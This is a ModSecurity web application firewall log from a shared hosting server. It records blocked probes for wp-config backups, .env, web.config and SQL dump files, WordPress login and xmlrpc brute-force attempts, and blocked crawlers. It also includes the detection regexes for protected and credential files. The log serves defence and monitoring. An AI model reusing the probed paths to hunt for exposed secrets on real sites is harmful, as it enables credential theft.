[Tue May 26 14:30:34.020112 2026] [security2:error] [pid 610693:tid 610752] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php"] [unique_id "ahVhMjvNO3hpmlY6M8RxhAAAZTo"]
[Tue May 26 14:30:34.355831 2026] [security2:error] [pid 610693:tid 610766] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/config.php.bak"] [unique_id "ahVhMjvNO3hpmlY6M8RxhgAANEg"]
[Tue May 26 14:30:34.721206 2026] [security2:error] [pid 606909:tid 607134] [client 154.161.32.97:46540] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhMl0yRtX9qA7aVUV2rAAAAOQ"]
[Tue May 26 14:30:34.743781 2026] [security2:error] [pid 610693:tid 610751] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.backup"] [unique_id "ahVhMjvNO3hpmlY6M8RxjgAAdDk"]
[Tue May 26 14:30:35.030430 2026] [security2:error] [pid 610693:tid 610899] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhMjvNO3hpmlY6M8RxiwAAAEw"]
[Tue May 26 14:30:35.528607 2026] [security2:error] [pid 610693:tid 610881] [client 34.74.242.206:1544] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVhMzvNO3hpmlY6M8RxkQAAADo"]
[Tue May 26 14:30:35.528732 2026] [security2:error] [pid 610693:tid 610881] [client 34.74.242.206:1544] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVhMzvNO3hpmlY6M8RxkQAAADo"]
[Tue May 26 14:30:35.528830 2026] [security2:error] [pid 610693:tid 610764] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.bak"] [unique_id "ahVhMzvNO3hpmlY6M8RxkgAAbkY"]
[Tue May 26 14:30:35.668969 2026] [security2:error] [pid 610693:tid 610832] [client 34.74.242.206:1564] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "businessclubinternational.net"] [uri "/"] [unique_id "ahVhMzvNO3hpmlY6M8RxkwAAAAk"]
[Tue May 26 14:30:35.669121 2026] [security2:error] [pid 610693:tid 610832] [client 34.74.242.206:1564] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "businessclubinternational.net"] [uri "/"] [unique_id "ahVhMzvNO3hpmlY6M8RxkwAAAAk"]
[Tue May 26 14:30:36.828758 2026] [security2:error] [pid 610693:tid 610767] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.old"] [unique_id "ahVhNDvNO3hpmlY6M8RxogAAKkk"]
[Tue May 26 14:30:36.892915 2026] [security2:error] [pid 610693:tid 610857] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhNDvNO3hpmlY6M8RxnAAAACI"]
[Tue May 26 14:30:37.270887 2026] [security2:error] [pid 610693:tid 610773] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.save"] [unique_id "ahVhNTvNO3hpmlY6M8RxqwAAbU8"]
[Tue May 26 14:30:37.477599 2026] [security2:error] [pid 610693:tid 610770] [remote 37.187.156.42:55058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVhNTvNO3hpmlY6M8RxrAAAPUw"]
[Tue May 26 14:30:37.632067 2026] [security2:error] [pid 610693:tid 610775] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.swp"] [unique_id "ahVhNTvNO3hpmlY6M8RxsgAADlE"]
[Tue May 26 14:30:38.784055 2026] [security2:error] [pid 610693:tid 610780] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.txt"] [unique_id "ahVhNjvNO3hpmlY6M8RxxgAASlY"]
[Tue May 26 14:30:39.117154 2026] [security2:error] [pid 610693:tid 610887] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhNjvNO3hpmlY6M8RxxQAAAEA"]
[Tue May 26 14:30:40.087572 2026] [security2:error] [pid 610693:tid 610937] [client 202.141.83.254:53841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhNzvNO3hpmlY6M8Rx3AAAAHI"]
[Tue May 26 14:30:40.087712 2026] [security2:error] [pid 610693:tid 610937] [client 202.141.83.254:53841] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhNzvNO3hpmlY6M8Rx3AAAAHI"]
[Tue May 26 14:30:40.957437 2026] [security2:error] [pid 606909:tid 607135] [client 193.37.33.150:39735] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVhN10yRtX9qA7aVUV3BQAAAOU"]
[Tue May 26 14:30:40.967380 2026] [security2:error] [pid 610693:tid 610898] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhODvNO3hpmlY6M8Rx7QAAAEs"]
[Tue May 26 14:30:43.252509 2026] [security2:error] [pid 610693:tid 610915] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhOjvNO3hpmlY6M8RyHQAAAFw"]
[Tue May 26 14:30:44.198487 2026] [security2:error] [pid 610693:tid 610793] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/web.config"] [unique_id "ahVhPDvNO3hpmlY6M8RyKgAAJGM"]
[Tue May 26 14:30:45.243554 2026] [security2:error] [pid 610693:tid 610932] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhPDvNO3hpmlY6M8RyMwAAAG0"]
[Tue May 26 14:30:45.328616 2026] [security2:error] [pid 606909:tid 607008] [remote 20.153.140.50:51044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVhPV0yRtX9qA7aVUV3MAAA3mI"]
[Tue May 26 14:30:47.290549 2026] [security2:error] [pid 606909:tid 607166] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhPl0yRtX9qA7aVUV3UQAAAQQ"]
[Tue May 26 14:30:47.600884 2026] [security2:error] [pid 610693:tid 610915] [client 69.165.72.57:61357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.72.165.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVhPzvNO3hpmlY6M8RyZAAAAFw"], referer: https://obinnawrites.com.thedebateafrica.org
[Tue May 26 14:30:48.749585 2026] [security2:error] [pid 610693:tid 610694] [remote 82.196.25.136:52402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVhQDvNO3hpmlY6M8RycgAAHwA"]
[Tue May 26 14:30:49.247680 2026] [security2:error] [pid 610693:tid 610943] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhQDvNO3hpmlY6M8RyeAAAAHg"]
[Tue May 26 14:30:50.321679 2026] [security2:error] [pid 610693:tid 610900] [client 202.141.83.254:5651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhQjvNO3hpmlY6M8RyiwAAAE0"]
[Tue May 26 14:30:50.321815 2026] [security2:error] [pid 610693:tid 610900] [client 202.141.83.254:5651] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhQjvNO3hpmlY6M8RyiwAAAE0"]
[Tue May 26 14:30:51.452499 2026] [security2:error] [pid 606909:tid 607039] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhQl0yRtX9qA7aVUV3fAAAAIU"]
[Tue May 26 14:30:51.851768 2026] [security2:error] [pid 610693:tid 610832] [client 104.28.122.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVhQzvNO3hpmlY6M8RyowAAAAk"]
[Tue May 26 14:30:53.530944 2026] [security2:error] [pid 610693:tid 610897] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhRTvNO3hpmlY6M8RytgAAAEo"]
[Tue May 26 14:30:54.506189 2026] [security2:error] [pid 610693:tid 610799] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/database.sql"] [unique_id "ahVhRjvNO3hpmlY6M8RyyQAAaGk"]
[Tue May 26 14:30:54.526388 2026] [security2:error] [pid 606909:tid 606967] [remote 74.7.241.58:37496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVhRl0yRtX9qA7aVUV3nwAA3Dk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:30:54.832774 2026] [security2:error] [pid 610693:tid 610812] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/dump.sql"] [unique_id "ahVhRjvNO3hpmlY6M8Ry1QAAd3Y"]
[Tue May 26 14:30:55.214592 2026] [security2:error] [pid 610693:tid 610820] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/backup.sql"] [unique_id "ahVhRzvNO3hpmlY6M8Ry2AAAW34"]
[Tue May 26 14:30:55.463651 2026] [security2:error] [pid 610693:tid 610699] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/db.sql"] [unique_id "ahVhRzvNO3hpmlY6M8Ry3AAAOgU"]
[Tue May 26 14:30:55.566438 2026] [security2:error] [pid 610693:tid 610826] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhRzvNO3hpmlY6M8Ry1wAAAAM"]
[Tue May 26 14:30:57.159445 2026] [security2:error] [pid 610693:tid 610904] [client 2.57.122.173:43156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.grcorp.moes-art.com"] [uri "/secrets/.env"] [unique_id "ahVhSTvNO3hpmlY6M8Ry-wAAAFE"]
[Tue May 26 14:30:57.708798 2026] [security2:error] [pid 610693:tid 610856] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhSTvNO3hpmlY6M8Ry_wAAACE"]
[Tue May 26 14:31:00.030375 2026] [security2:error] [pid 610693:tid 610711] [remote 103.91.67.202:59440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVhSzvNO3hpmlY6M8RzNQAAHxE"]
[Tue May 26 14:31:00.049150 2026] [security2:error] [pid 606909:tid 607103] [client 157.48.135.118:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhS10yRtX9qA7aVUV3ywAAAMU"]
[Tue May 26 14:31:00.666139 2026] [security2:error] [pid 610693:tid 610833] [client 202.141.83.254:5730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhTDvNO3hpmlY6M8RzQwAAAAo"]
[Tue May 26 14:31:00.666312 2026] [security2:error] [pid 610693:tid 610833] [client 202.141.83.254:5730] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhTDvNO3hpmlY6M8RzQwAAAAo"]
[Tue May 26 14:31:00.775742 2026] [security2:error] [pid 606909:tid 607107] [client 114.119.128.127:47275] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVhTF0yRtX9qA7aVUV31AAAAMk"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&product_id=94&page=8
[Tue May 26 14:31:01.147000 2026] [security2:error] [pid 610693:tid 610923] [client 216.244.66.241:51830] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVhTTvNO3hpmlY6M8RzSAAAAGQ"]
[Tue May 26 14:31:01.147145 2026] [security2:error] [pid 610693:tid 610923] [client 216.244.66.241:51830] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVhTTvNO3hpmlY6M8RzSAAAAGQ"]
[Tue May 26 14:31:01.147284 2026] [security2:error] [pid 606909:tid 607092] [client 216.244.66.241:51828] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVhTV0yRtX9qA7aVUV32AAAALo"]
[Tue May 26 14:31:01.147477 2026] [security2:error] [pid 606909:tid 607092] [client 216.244.66.241:51828] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVhTV0yRtX9qA7aVUV32AAAALo"]
[Tue May 26 14:31:01.363825 2026] [security2:error] [pid 606909:tid 607064] [client 2.57.122.173:25688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.grcorp.moes-art.com"] [uri "/.env"] [unique_id "ahVhTV0yRtX9qA7aVUV33AAAAJ4"]
[Tue May 26 14:31:02.503441 2026] [security2:error] [pid 606909:tid 607153] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhTl0yRtX9qA7aVUV36gAAAPc"]
[Tue May 26 14:31:02.997837 2026] [security2:error] [pid 610693:tid 610860] [client 154.161.32.97:46541] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhTjvNO3hpmlY6M8RzWQAAACU"]
[Tue May 26 14:31:03.708212 2026] [security2:error] [pid 610693:tid 610936] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhTzvNO3hpmlY6M8RzYwAAAHE"]
[Tue May 26 14:31:05.883123 2026] [security2:error] [pid 610693:tid 610840] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhUTvNO3hpmlY6M8RzgQAAABE"]
[Tue May 26 14:31:05.945802 2026] [security2:error] [pid 610693:tid 610927] [client 85.208.96.209:54774] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVhUTvNO3hpmlY6M8RzigAAAGg"]
